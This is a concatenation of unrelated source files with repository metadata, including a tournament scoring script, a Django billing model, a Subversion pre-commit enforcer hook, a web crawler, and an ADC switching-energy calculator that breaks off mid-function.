cameronkramr@mines.edu
|
e7402159b694a4820f2b00e2af214a79f9043612
|
e965225b5b16feb3a8264980cdeff83342e1167c
|
/pythontask.py
|
a4b01f83681283f4550677aedce2dd6b39d9b2de
|
[] |
no_license
|
challapavankumar/Archeville-Super-Archy-Tournament-task
|
7b8631fe448f04f9ed335327e1a2457c3bc8e5cf
|
d646a830865f5607193ca883a217974fb4e5a641
|
refs/heads/main
| 2023-01-31T15:03:21.658700
| 2020-12-18T06:11:14
| 2020-12-18T06:11:14
| 322,502,956
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,858
|
py
|
rounds = int(input("No of rounds to play "))
scores={"A":50,"B":4,"C":3,"D":2,"E":1,"F":0}
bonuscheck=[]
bonusplayer=[]
teams={"Gyrhuna":[{"Jaons Diak":0},{"Susu":0}],
"Achni":[{"Milog":0},{"Tianlong":0}],
"Bathar":[{"Pakhangba":0},{"Poubi Lai Paphal":0}]}
teamno=len(teams)
bonusteam={}
teamscore={}
def WhoWonTheMatch(teamscore):
return [key for (key, value) in teamscore.items() if value == max(teamscore.values())]
for team in teams:
bonusteam[team]=0
teamscore[team]=0
players=0
for i in teams:
players+=len(teams[i])
playerscores={}
for r in range(rounds):
for team in teams:
bonuscheck=[]
bonusplayer=[]
teamscore[team]=0
for pl in teams[team]:
key, value = list(pl.items())[0]
temp=0
playerscore=(input("Enter the score of " +str(key)+str(" from team ")+team+" "))
if playerscore not in (["A","B","C","D","E","F"]):
print("Please select the score from A-F")
exit(0)
bonuscheck.append(playerscore)
bonusplayer.append(key)
prefix=key
if prefix not in playerscores:
playerscores[prefix]=scores[playerscore]
else:
playerscores[prefix]+=scores[playerscore]
temp=playerscores[prefix]
teamscore[team]+=playerscores[prefix]
if(len(set(bonuscheck))==1):
bonusteam[team]+=2
teamscore[team]+=bonusteam[team]
scores={key:value+1 if(key!="F") else value for key,value in(scores.items()) }
print(playerscores)
print(bonusteam)
print(teamscore)
print("Next Round")
key=WhoWonTheMatch(teamscore)[0]
print("Game over. {} won!!!".format(key))
|
[
"noreply@github.com"
] |
challapavankumar.noreply@github.com
|
3a605cd5f0f7781f3d75d4937b802eac9ac2dd09
|
4accbb2bb2f7cc2b6b5855afe52c1bb4561c8da6
|
/Unstructured Programs For Testing/CSVtoNumpy2.py
|
85b4f08e7b464e239c7ab173dd45a90b55e10ebf
|
[] |
no_license
|
WrathTitan/DLNeuralNetwork
|
e993f37faca865c369138ea61b346f9a998ad690
|
c82ba35c1cf6cd20c573200d4c3f038e8f434d9e
|
refs/heads/master
| 2023-04-04T06:50:19.007794
| 2021-04-23T16:18:10
| 2021-04-23T16:18:10
| 307,389,978
| 0
| 0
| null | 2020-10-29T16:24:58
| 2020-10-26T13:57:02
|
Python
|
UTF-8
|
Python
| false
| false
| 565
|
py
|
import numpy as np
import csv
myarr=np.genfromtxt('superfilteredFinal.csv',delimiter=',')
print(myarr)
print(myarr.shape)
print(myarr.T)
print("Ended one file")
mynewarr=np.genfromtxt('filteredFinal.csv',delimiter=',')
awesomestuff=mynewarr[:,1:]
print(awesomestuff)
print(awesomestuff.shape)
print(awesomestuff.T)
#my_data=pd.read_csv('superfilteredFinal.csv',sep=',',header=None)
#data_X=my_data.T
#print(data_X)
#print(data_X.shape)
#my_data=pd.read_csv('filteredFinal.csv',sep=',',header=None).T
#data_Y=my_data.iloc[1:,]
#print(data_Y)
#print(data_Y.shape)
|
[
"rishabhbhatt159@gmail.com"
] |
rishabhbhatt159@gmail.com
|
1c6ff28e26ea56bf58d2d64410f7f7ccc128b1c3
|
a51854991671a4389902945578288da34845f8d9
|
/libs/Utility/__init__.py
|
413df21a5385589d95b5c2ec9bf735a694a5e504
|
[] |
no_license
|
wuyou1102/DFM_B2
|
9210b4b8d47977c50d92ea77791f477fa77e5f83
|
69ace461b9b1b18a2269568110cb324c04ad4266
|
refs/heads/master
| 2020-04-13T18:54:20.045734
| 2019-06-17T12:46:23
| 2019-06-17T12:46:23
| 163,387,873
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 297
|
py
|
# -*- encoding:UTF-8 -*-
from libs.Utility import Logger
import Alert as Alert
import Random as Random
from ThreadManager import append_thread
from ThreadManager import is_alive
from ThreadManager import query_thread
from Common import *
import ParseConfig as ParseConfig
from Serial import Serial
|
[
"jotey@qq.com"
] |
jotey@qq.com
|
d57c68ff01ec5c6b974091d91da38f8ac7708ec3
|
26371093460ea3026cdcd74e624b0c2d4b1d5892
|
/Staff.py
|
2fae3241689d94a0185840d38b2a6b21e9b9a6a3
|
[] |
no_license
|
meyerkeaton/ktmcbk
|
0b636b1bc8e8be022f6423d88776191a606949c7
|
5bca15495ee1066658c59ae24c15be4028f8a4ff
|
refs/heads/main
| 2022-12-28T05:41:09.453076
| 2020-10-15T05:09:20
| 2020-10-15T05:09:20
| 304,215,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 883
|
py
|
import json
import User
class Staff(User.User):
def update_course_db(self):
with open('Data/courses.json', 'w') as fp:
json.dump(self.all_courses, fp)
def create_assignment(self,assignment_name, due_date, course):
assignment = {
assignment_name: {
'due_date': due_date
}
}
self.all_courses[course]['assignments'].update(assignment)
self.update_course_db()
def change_grade(self,user,course,assignment,grade):
self.users[user]['courses'][course][assignment]['grade'] = 0
self.update_user_db()
def check_grades(self,name,course):
assignments = self.users[name]['courses'][course]
grades = []
for key in assignments:
grades.append([key, assignments[key]['grade']])
return grades
|
[
"noreply@github.com"
] |
meyerkeaton.noreply@github.com
|
b799cd1b2094b8b6d385a69a3678787901adbe06
|
471e1738186b51373aa73057d91bbdb2575be6d6
|
/anuario/pesquisador/admin.py
|
fd6fa9091a51a4000f772d4e4fb55386e31f74a4
|
[] |
no_license
|
pixies/portal-anuario-pesquisa
|
1939c074ba9a70d715c0c48b07741364161a77b8
|
38873ec820ac75977ba2f989b1a472e1b9c62a4a
|
refs/heads/master
| 2021-01-12T17:49:37.337465
| 2016-09-29T17:10:05
| 2016-09-29T17:10:05
| 69,398,984
| 0
| 0
| null | 2016-09-27T21:11:15
| 2016-09-27T21:11:15
| null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
from django.contrib import admin
from .models import Pesquisador, Curso, Instituicao
# Register your models here.
admin.site.register(Pesquisador)
#admin.site.register(Curso)
#admin.site.register(Instituicao)
|
[
"eu@cflb.co"
] |
eu@cflb.co
|
bcfca9b47c82bc52528894a9459bda4232f48196
|
f582461cc398909906a1ca65fa250105319289d8
|
/spider_main.py
|
986f58a635f53e9861335c7fe8c902f544f9017e
|
[] |
no_license
|
ITT13021/baike_spider
|
d0dd637074c99cd7a1b9d703b4406939ed745fbd
|
2a2eea68dd94bf15ec1769986554514c53a28854
|
refs/heads/master
| 2021-07-04T12:33:37.377379
| 2017-09-27T01:49:00
| 2017-09-27T01:49:00
| 104,868,967
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,568
|
py
|
# coding=utf-8
from baike_spider import html_downloader
from baike_spider import html_outputer
from baike_spider import html_parser
from baike_spider import url_manager
class SpriderMain(object):
def __init__(self):
self.urls = url_manager.UrlManager()
self.downloader = html_downloader.HtmlDownloader()
self.parser = html_parser.HtmlParser()
self.outputer = html_outputer.HtmlOutputer()
def craw(self, root_url, count):
i = 1
self.urls.add_new_url(root_url)
while self.urls.has_new_url():
if count != 0:
try:
new_url = self.urls.get_new_url()
print 'we are collecting in %d : %s' % (i, new_url)
html_cont = self.downloader.download(new_url)
new_urls, new_data = self.parser.parse(new_url, html_cont)
self.urls.add_new_urls(new_urls)
self.outputer.collect_data(new_data)
except:
print "collected failed in %d" % i
i += 1
count -= 1
else:
break
self.outputer.output_html()
if __name__ == "__main__":
obj_spider = SpriderMain()
root_url = raw_input("请输入您要爬取首个百度百科词条的页面,我们会搜索与其相关的词条,例如:https://baike.baidu.com/item/Python:" + "\n")
count = input("请输入您要爬取词条的个数(爬取越多消耗时间越长哦!): ")
obj_spider.craw(root_url, count)
|
[
"473457683@qq.com"
] |
473457683@qq.com
|
04a4e80f246a131d68d2616fcf175a178c694d71
|
d87d83049f28da72278ca9aa14986db859b6c6d6
|
/basic/coreFundamental/split_And_Join_And_strip/splitDemo.py
|
91db33efa0f6d30926f416fb183b4cd31e8ff63d
|
[] |
no_license
|
MonadWizard/python-basic
|
6507c93dc2975d6450be27d08fb219a3fd80ed64
|
624f393fcd19aeeebc35b4c2225bb2fe8487db39
|
refs/heads/master
| 2021-07-21T16:12:58.251456
| 2020-10-12T19:46:21
| 2020-10-12T19:46:21
| 223,625,523
| 1
| 0
| null | 2019-11-23T18:01:43
| 2019-11-23T17:14:21
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,046
|
py
|
s = 'this is a string of words'
print(s.split())
print("""
""")
print('That is also a string'.split())
print("""
""")
print(s.split('i'))
print("""
""")
words = s.split()
print(words)
for w in words:
print(w)
# rsplit
demo = "this is a fucked up"
rsplitee = demo.rsplit(sep=" ", maxsplit=2)
print(rsplitee)
# lsplit
demo = "this is a fucked up"
lsplitee = demo.split(sep=" ", maxsplit=2)
print(lsplitee)
# splitlines split in \n
demo = "this is a fucked up\nfucking univers"
nsplitee = demo.splitlines()
print(nsplitee)
# test
file = """mtv films election, a high school comedy, is a current example
from there, director steven spielberg wastes no time, taking us into the water on a midnight swim
"""
file_split = file.splitlines()
# Print file_split
print(file_split)
# Complete for-loop to split by commas
for substring in file_split:
substring_split = substring.split(",")
print(substring_split)
|
[
"monad.wizar.r@gmail.com"
] |
monad.wizar.r@gmail.com
|
940dfcffd7da2f2431e4e7d093e93c7a44d5ca3b
|
9699ff2d4f407746c80c507f158da02f5ab9596a
|
/subversion/contrib/hook-scripts/enforcer/.svn/text-base/enforcer.svn-base
|
caacf749ddd37057e18c2fd432789b0043a5914f
|
[
"BSD-3-Clause",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"X11"
] |
permissive
|
AsherBond/MondocosmOS-Dependencies
|
7af67e41ae60b578800fc4184fa69a6b44da1715
|
bfd2554e6c2cfc4bc1ecb2b653594ca9f0448392
|
refs/heads/master
| 2021-01-23T13:53:07.122515
| 2011-10-03T13:22:43
| 2011-10-03T13:22:43
| 2,504,513
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,260
|
#!/usr/bin/python
# -*- coding:utf-8;mode:python;mode:font-lock -*-
##
# Utility for Subversion commit hook scripts
# This script enforces certain coding guidelines
##
# Copyright (c) 2005 Wilfredo Sanchez Vega <wsanchez@wsanchez.net>.
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHORS DISCLAIM ALL
# WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
# DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
# PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
# TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
##
import sys
import os
import getopt
import popen2
#
# FIXME: Should probably retool this using python bindings, not svnlook
#
__doc__ = '''
Enforcer is a utility which can be used in a Subversion pre-commit
hook script to enforce various requirements which a repository
administrator would like to impose on data coming into the repository.
A couple of example scenarios:
- In a Java project I work on, we use log4j extensively. Use of
System.out.println() bypasses the control that we get from log4j,
so we would like to discourage the addition of println calls in our
code.
We want to deny any commits that add a println into the code. The
world being full of exceptions, we do need a way to allow some uses
of println, so we will allow it if the line of code that calls
println ends in a comment that says it is ok:
System.out.println("No log4j here"); // (authorized)
We also do not (presently) want to refuse a commit to a file which
already has a println in it. There are too many already in the
code and a given developer may not have time to fix them up before
commiting an unrelated change to a file.
- The above project uses WebObjects, and you can enable debugging in
a WebObjects component by turning on the WODebug flag in the
component WOD file. That is great for debugging, but massively
bloats the log files when the application is deployed.
We want to disable any commit of a file enabling WODebug,
regardless of whether the committer made the change or not; these
have to be cleaned up before any successful commit.
What this script does is it uses svnlook to peek into the transaction
is progress. As it sifts through the transaction, it calls out to a
set of hooks which allow the repository administrator to examine what
is going on and decide whether it is acceptable. Hooks may be written
(in Python) into a configuration file. If the hook raises an
exception, enforcer will exit with an error status (and presumably the
commit will be denied by th pre-commit hook). The following hooks are
available:
verify_file_added(filename)
- called when a file is added.
verify_file_removed(filename)
- called when a file is removed.
verify_file_copied(destination_filename, source_filename)
- called when a file is copied.
verify_file_modified(filename)
- called when a file is modified.
verify_line_added(filename, line)
- called for each line that is added to a file.
(verify_file_modified() will have been called on the file
beforehand)
verify_line_removed(filename, line)
- called for each line that is removed from a file.
(verify_file_modified() will have been called on the file
beforehand)
verify_property_line_added(filename, property, line)
- called for each line that is added to a property on a file.
verify_property_line_removed(filename, property, line)
- called for each line that is removed from a property on a file.
In addition, these functions are available to be called from within a
hook routine:
open_file(filename)
- Returns an open file-like object from which the data of the given
file (as available in the transaction being processed) can be
read.
In our example scenarios, we can deny the addition of println calls by
hooking into verify_line_added(): if the file is a Java file, and the
added line calls println, raise an exception.
Similarly, we can deny the commit of any WOD file enabling WODebug by
hooking into verify_file_modified(): open the file using open_file(),
then raise if WODebug is enabled anywhere in the file.
Note that verify_file_modified() is called once per modified file,
whereas verify_line_added() and verify_line_removed() may each be
called zero or many times for each modified file, depending on the
change. This makes verify_file_modified() appropriate for checking
the entire file and the other two appropriate for checking specific
changes to files.
These example scenarios are implemented in the provided example
configuration file "enforcer.conf".
When writing hooks, it is usually easier to test the hooks on committed
transactions already in the repository, rather than installing the
hook and making commits to test the them. Enforcer allows you to
specify either a transaction ID (for use in a hook script) or a
revision number (for testing). You can then, for example, find a
revision that you would like to have blocked (or not) and test your
hooks against that revision.
'''
__author__ = "Wilfredo Sanchez Vega <wsanchez@wsanchez.net>"
##
# Handle command line
##
program = os.path.split(sys.argv[0])[1]
debug = 0
transaction = None
revision = None
def usage(e=None):
if e:
print e
print ""
print "usage: %s [options] repository config" % program
print "options:"
print "\t-d, --debug Print debugging output; use twice for more"
print "\t-r, --revision rev Specify revision to check"
print "\t-t, --transaction txn Specify transaction to check"
print "Exactly one of --revision or --transaction is required"
sys.exit(1)
# Read options
try:
(optargs, args) = getopt.getopt(sys.argv[1:], "dt:r:", ["debug", "transaction=", "revision="])
except getopt.GetoptError, e:
usage(e)
for optarg in optargs:
(opt, arg) = optarg
if opt in ("-d", "--debug" ): debug += 1
elif opt in ("-t", "--transaction"): transaction = arg
elif opt in ("-r", "--revision" ): revision = arg
if transaction and revision:
usage("Cannot specify both transaction and revision to check")
if not transaction and not revision:
usage("Must specify transaction or revision to check")
if not len(args): usage("No repository")
repository = args.pop(0)
if not len(args): usage("No config")
configuration_filename = args.pop(0)
if len(args): usage("Too many arguments")
##
# Validation
# All rule enforcement goes in these routines
##
def open_file(filename):
"""
Retrieves the contents of the given file.
"""
cat_cmd = [ "svnlook", "cat", None, repository, filename ]
if transaction: cat_cmd[2] = "--transaction=" + transaction
elif revision: cat_cmd[2] = "--revision=" + revision
else: raise ValueError("No transaction or revision")
cat_out, cat_in = popen2.popen2(cat_cmd)
cat_in.close()
return cat_out
def verify_file_added(filename):
"""
Here we verify file additions which may not meet our requirements.
"""
if debug: print "Added file %r" % filename
if configuration.has_key("verify_file_added"):
configuration["verify_file_added"](filename)
def verify_file_removed(filename):
"""
Here we verify file removals which may not meet our requirements.
"""
if debug: print "Removed file %r" % filename
if configuration.has_key("verify_file_removed"):
configuration["verify_file_removed"](filename)
def verify_file_copied(destination_filename, source_filename):
"""
Here we verify file copies which may not meet our requirements.
"""
if debug: print "Copied %r to %r" % (source_filename, destination_filename)
if configuration.has_key("verify_file_copied"):
configuration["verify_file_copied"](destination_filename, source_filename)
def verify_file_modified(filename):
"""
Here we verify files which may not meet our requirements.
Any failure, even if not due to the specific changes in the commit
will raise an error.
"""
if debug: print "Modified file %r" % filename
if configuration.has_key("verify_file_modified"):
configuration["verify_file_modified"](filename)
def verify_line_added(filename, line):
"""
Here we verify new lines of code which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if configuration.has_key("verify_line_added"):
configuration["verify_line_added"](filename, line)
def verify_line_removed(filename, line):
"""
Here we verify removed lines of code which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if configuration.has_key("verify_line_removed"):
configuration["verify_line_removed"](filename, line)
def verify_property_line_added(filename, property, line):
"""
Here we verify added property lines which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if debug: print "Add %s::%s: %s" % (filename, property, line)
if configuration.has_key("verify_property_line_added"):
configuration["verify_property_line_added"](filename, property, line)
def verify_property_line_removed(filename, property, line):
"""
Here we verify removed property lines which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if debug: print "Del %s::%s: %s" % (filename, property, line)
if configuration.has_key("verify_property_line_removed"):
configuration["verify_property_line_removed"](filename, property, line)
##
# Do the Right Thing
##
configuration = {"open_file": open_file}
execfile(configuration_filename, configuration, configuration)
diff_cmd = [ "svnlook", "diff", None, repository ]
if transaction: diff_cmd[2] = "--transaction=" + transaction
elif revision: diff_cmd[2] = "--revision=" + revision
else: raise ValueError("No transaction or revision")
diff_out, diff_in = popen2.popen2(diff_cmd)
diff_in.close()
try:
state = 0
#
# This is the svnlook output parser
#
for line in diff_out:
if line[-1] == "\n": line = line[:-1] # Zap trailing newline
# Test cases:
# r2266: Added text files, property changes
# r18923: Added, deleted, modified text files
# r25692: Copied files
# r7758: Added binary files
if debug > 1: print "%4d: %s" % (state, line) # Useful for testing parser problems
if state is -1: # Used for testing new states: print whatever is left
print line
continue
if state in (0, 100, 300): # Initial state or in a state that may return to initial state
if state is 0 and not line: continue
colon = line.find(":")
if state is not 300 and colon != -1 and len(line) > colon + 2:
action = line[:colon]
filename = line[colon+2:]
if action in (
"Modified",
"Added", "Deleted", "Copied",
"Property changes on",
):
if action == "Modified": verify_file_modified(filename)
elif action == "Added" : verify_file_added (filename)
elif action == "Deleted" : verify_file_removed (filename)
elif action == "Copied":
i = filename.find(" (from rev ")
destination_filename = filename[:i]
filename = filename[i:]
i = filename.find(", ")
assert filename[-1] == ")"
source_filename = filename[i+2:-1]
verify_file_copied(destination_filename, source_filename)
filename = destination_filename
if action == "Modified" : state = 10
elif action == "Added" : state = 10
elif action == "Deleted" : state = 10
elif action == "Copied" : state = 20
elif action == "Property changes on": state = 30
else: raise AssertionError("Unknown action")
current_filename = filename
current_property = None
continue
assert state in (100, 300)
if state is 10: # Expecting a bar (follows "(Added|Modified|Deleted):" line)
assert line == "=" * 67
state = 11
continue
if state is 11: # Expecting left file info (follows bar)
if line == "": state = 0
elif line == "(Binary files differ)": state = 0
elif line.startswith("--- "): state = 12
else: raise AssertionError("Expected left file info, got: %r" % line)
continue
if state is 12: # Expecting right file info (follows left file info)
assert line.startswith("+++ " + current_filename)
state = 100
continue
if state is 20: # Expecting a bar or blank (follows "Copied:" line)
# Test cases:
# r25692: Copied and not modified (blank)
# r26613: Copied and modified (bar)
if not line:
state = 0
elif line == "=" * 67:
state = 11
else:
raise AssertionError("After Copied: line, neither bar nor blank: %r" % line)
continue
if state is 100: # Expecting diff data
for c, verify in (("-", verify_line_removed), ("+", verify_line_added)):
if len(line) >= 1 and line[0] == c:
try: verify(current_filename, line[1:])
except Exception, e:
sys.stderr.write(str(e))
sys.stderr.write("\n")
sys.exit(1)
break
else:
if (
not line or
(len(line) >= 4 and line[:2] == "@@" == line[-2:]) or
(len(line) >= 1 and line[0] == " ") or
line == "\\ No newline at end of file"
):
continue
raise AssertionError("Expected diff data, got: %r" % line)
continue
if state is 30: # Expecting a bar (follows "Property changes on:" line)
assert line == "_" * 67
state = 31
continue
if state is 31: # Expecting property name (follows bar)
for label in (
"Name", # svn versions < 1.5
"Added", "Modified", "Deleted" # svn versions >= 1.5
):
if line.startswith(label + ": "):
break
else:
raise AssertionError("Unexpected property name line: %r" % line)
state = 300
# Fall through to state 300
if state is 300:
if not line:
state = 0
continue
for label in (
"Name", # svn versions < 1.5
"Added", "Modified", "Deleted" # svn versions >= 1.5
):
if line.startswith(label + ": "):
current_property = line[len(label)+2:]
current_verify_property_function = None
break
else:
for prefix, verify in (
(" - ", verify_property_line_removed),
(" + ", verify_property_line_added)
):
if line.startswith(prefix):
try: verify(current_filename, current_property, line[5:])
except Exception, e:
sys.stderr.write(str(e))
sys.stderr.write("\n")
sys.exit(1)
current_verify_property_function = verify
break
else:
if not line: continue
if current_verify_property_function is None:
raise AssertionError("Expected property diff data, got: %r" % line)
else:
# Multi-line property value
current_verify_property_function(current_filename, current_property, line)
continue
raise AssertionError("Unparsed line: %r" % line)
if debug: print "Commit is OK"
finally:
for line in diff_out: pass
diff_out.close()
|
[
"asherbond@asherbond.com"
] |
asherbond@asherbond.com
|
|
653e1569defce82bd7cefae6b2b508f8851295a1
|
af4b590504660a302f53a6fd99a5cb2e1244b85f
|
/src/billing/models.py
|
d6325f0ceba818542cbc794137a9674a6eddcd9c
|
[] |
no_license
|
qkhan/NewEcommerce
|
3216da9e80567f9c548efcac0dd00ee754399848
|
12f40adf071471bdc30d76e07bc563949c5f5d19
|
refs/heads/master
| 2020-03-09T22:59:24.568434
| 2018-04-11T06:52:10
| 2018-04-11T06:52:10
| 129,048,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,701
|
py
|
from django.conf import settings
from django.db import models
from accounts.models import GuestEmail
from django.db.models.signals import pre_save, post_save
User = settings.AUTH_USER_MODEL
class BillingProfileManager(models.Manager):
def new_or_get(self, request):
user = request.user
guest_email_id = request.session.get('guest_email_id')
print("Guest email id: ", guest_email_id)
created = False
obj = None
if user.is_authenticated():
'logged in user checkout; remember payment stuff'
obj, created = self.model.objects.get_or_create(user=user, email=user.email)
#print("Billing Profile:", billing_profile, " | ", billing_profile_created)
elif guest_email_id is not None:
'guest user checkout; auto reloads payment stuff'
guest_email_obj = GuestEmail.objects.get(id=guest_email_id)
obj, created = self.model.objects.get_or_create(email=guest_email_obj.email)
else:
pass
return obj, created
# Create your models here.
class BillingProfile(models.Model):
user = models.OneToOneField(User, null=True, blank=True)
email = models.EmailField()
active = models.BooleanField(default=True)
update = models.DateTimeField(auto_now=True)
timestamp = models.DateTimeField(auto_now_add=True)
objects = BillingProfileManager()
def __str__(self):
return self.email
def user_created_receiver(sender, instance, created, *args, **kwargs):
if created and instance.email:
BillingProfile.objects.get_or_create(user=instance, email=instance.email)
post_save.connect(user_created_receiver, sender=User)
|
[
"qaisarkhan@Qaisars-iMac.local"
] |
qaisarkhan@Qaisars-iMac.local
|
d8aac991213a5218618098233100d5a23603c036
|
9d48dc6e54f959285ed3ab15006d664d42db7c01
|
/assistant_module/get_energy.py
|
17e7b4311937c5f4041a66ce17b38da77f929ad5
|
[] |
no_license
|
sandylaker/saradc_toolbox
|
d971936ec5b13fb467f991b351b30fccad00876a
|
b7b8f3d6c15a7c522cd89267739318c78e4d6a37
|
refs/heads/master
| 2020-03-27T11:42:29.520183
| 2018-09-15T21:03:47
| 2018-09-15T21:03:47
| 146,503,308
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,098
|
py
|
import numpy as np
from assistant_module.get_decision_path import get_decision_path
def get_energy(n, switch='conventional', structure='conventional'):
"""
get the energy consumption of every code, each code represents the possible decision level before the last
decision(a odd decimal integer).
:param n: resolution of DAC
:param switch: switching method: 'conventional': conventional one-step switching
'monotonic': monotonic capacitor switching, in each transition step, only one
capacitor in one side is switched.
'mcs': merged capacitor switching
'split': split-capacitor method. The MSB capacitor is split into a copy of the
rest of the capacitor array. When down-switching occurs, only the
corresponding capacitor in the sub-capacitor array is discharged to the
ground
:param structure: structure of ADC: 'conventional': conventional single-ended structure
'differential': has two arrays of capacitors, the switch states of positive and
negative side are complementary. The energy consumption is two
times of that in the conventional structure, if conventional
switching method is used.
:return: a ndarray, each element represents the energy consumption of each code.
"""
# possible decision level before the last comparision
code_decimal = np.arange(1, 2 ** n, 2)
decision_path = get_decision_path(n) # two-dimensional
# store the switching energy of each code
sw_energy_sum = np.zeros(len(code_decimal))
if switch == 'conventional':
coefficient = 1
if structure == 'differential':
# the switching states of both sides are complementary, so that the energy consumption is two times of
# that in conventional(single-ended) structure.
coefficient = 2
for i in range(len(code_decimal)):
# weight of each decision threshold layer
weights_ideal = [0.5 ** (i + 1) for i in range(n)]
sw_energy = np.zeros(n)
sw_energy[0] = 0.5 * decision_path[i, 0]
# calculate the energy for up-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
# print(code_decimal[i],' sw_up_pos: ',sw_up_pos)
if not sw_up_pos.size == 0:
# sw_energy[sw_up_pos] = decision_path[i,sw_up_pos]*(-1)*(weights_ideal[sw_up_pos])+ 2**(n-1-sw_up_pos)
# 2**(n-1-sw_up_pos) stands for E_sw = C_up*V_ref^2
for k in sw_up_pos:
# \delta V_x is positive,so *(-1)
sw_energy[k] = decision_path[i, k] * \
(-1) * (weights_ideal[k]) + 2**(n - 1 - k)
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
# print(code_decimal[i],' sw_dn_pos: ',sw_dn_pos)
if not sw_dn_pos.size == 0:
# sw_energy[sw_dn_pos] = decision_path[i,sw_dn_pos]*(-1)*(weights_ideal[sw_dn_pos]) + 2**(n-1-sw_dn_pos)
for k in sw_dn_pos:
sw_energy[k] = decision_path[i, k] * \
(weights_ideal[k]) + 2**(n - 1 - k)
# print(code_decimal[i],': ',sw_energy)
sw_energy_sum[i] = np.sum(sw_energy)
return coefficient * sw_energy_sum
if switch == 'monotonic':
if structure == 'conventional':
raise Exception(
'Conventional(single-ended) structure does not support monotonic switching.')
for i in range(len(code_decimal)):
# the total capacitance of positive and negative sides
c_tp = c_tn = 2 ** (n - 1)
# vx unchanged in the first step
weights_ideal = np.concatenate(
([0], [0.5 ** j for j in range(1, n)]))
sw_energy = np.zeros(n)
sw_energy[0] = 0
# define an array to store the switching types(up or down) of each
# step.
sw_process = np.zeros(n)
# find the up-switching and down-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1, 0
for k in range(1, n):
# if up-switching occurs, a capacitor of the p-side will be connected to the ground while n-side remains
# unchanged; if down-switching occurs, a capacitor of n -side will be connected to the ground while
# p-side remains unchanged. Attention: here is the range(1,n), when k starts from 1, the first
# capacitor switched to the ground is 2**(n-2)*C0 ( the MSB capacitor differs from which in the
# conventional case.
c_tp = c_tp - 2**(n - 1 - k) * sw_process[k]
c_tn = c_tn - 2**(n - 1 - k) * (1 - sw_process[k])
sw_energy[k] = c_tp * (-1) * (- weights_ideal[k]) * sw_process[k] + \
c_tn * (-1) * (- weights_ideal[k]) * (1 - sw_process[k])
sw_energy_sum[i] = np.sum(sw_energy)
return sw_energy_sum
if switch == 'mcs':
if structure == 'conventional':
raise Exception(
'Conventional(single-ended) structure does not support monotonic switching.')
weights_ideal = np.concatenate(
([0.5 ** j for j in range(1, n)], [0.5 ** (n - 1)]))
cap_ideal = np.concatenate(
([2 ** (n - 2 - j) for j in range(n - 1)], [1]))
for i in range(len(code_decimal)):
sw_energy = np.zeros(n)
# find the up-switching and down-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
# connection of bottom plates of positive and negative capacitor arrays.
# at the sampling phase, all the bottom plates are connected to Vcm
# = 0.5* Vref
cap_connect_p = np.full((n, n), 0.5)
cap_connect_n = np.full((n, n), 0.5)
# define an array to store the switching types(up or down) of each
# step.
sw_process = np.zeros(n)
sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1.0, 0
# store the v_x of both sides in each step, here the term v_ip and
# v_in are subtracted.
v_xp = np.zeros(n)
v_xn = np.zeros(n)
# store the voltage difference between the plates of each capacitor in each step, here the term v_ip- v_cm
# and v_in - v_cm are subtracted, because when calculating the change of v_cap, these terms are constant and
# so eliminated.
v_cap_p = np.zeros((n, n))
v_cap_n = np.zeros((n, n))
for k in range(1, n):
# update the connections of bottom plates
cap_connect_p[k:, k - 1], cap_connect_n[k:,
k - 1] = 1 - sw_process[k], sw_process[k]
v_xp[k] = np.inner(cap_connect_p[k], weights_ideal)
v_xn[k] = np.inner(cap_connect_n[k], weights_ideal)
# calculate the voltage across the top and bottom plates of
# capacitors
v_cap_p[k] = v_xp[k] - cap_connect_p[k]
v_cap_n[k] = v_xn[k] - cap_connect_n[k]
# find index of the capacitors connected to the reference
# voltage
c_tp_index = np.where(cap_connect_p[k] == 1.0)[0]
c_tn_index = np.where(cap_connect_n[k] == 1.0)[0]
# energy = - V_ref * ∑(c_t[j] * ∆v_cap[j])
sw_energy_p = - \
np.inner(cap_ideal[c_tp_index], (v_cap_p[k, c_tp_index] - v_cap_p[k - 1, c_tp_index]))
sw_energy_n = - \
np.inner(cap_ideal[c_tn_index], (v_cap_n[k, c_tn_index] - v_cap_n[k - 1, c_tn_index]))
sw_energy[k] = sw_energy_p + sw_energy_n
sw_energy_sum[i] = np.sum(sw_energy)
return sw_energy_sum
if switch == 'split':
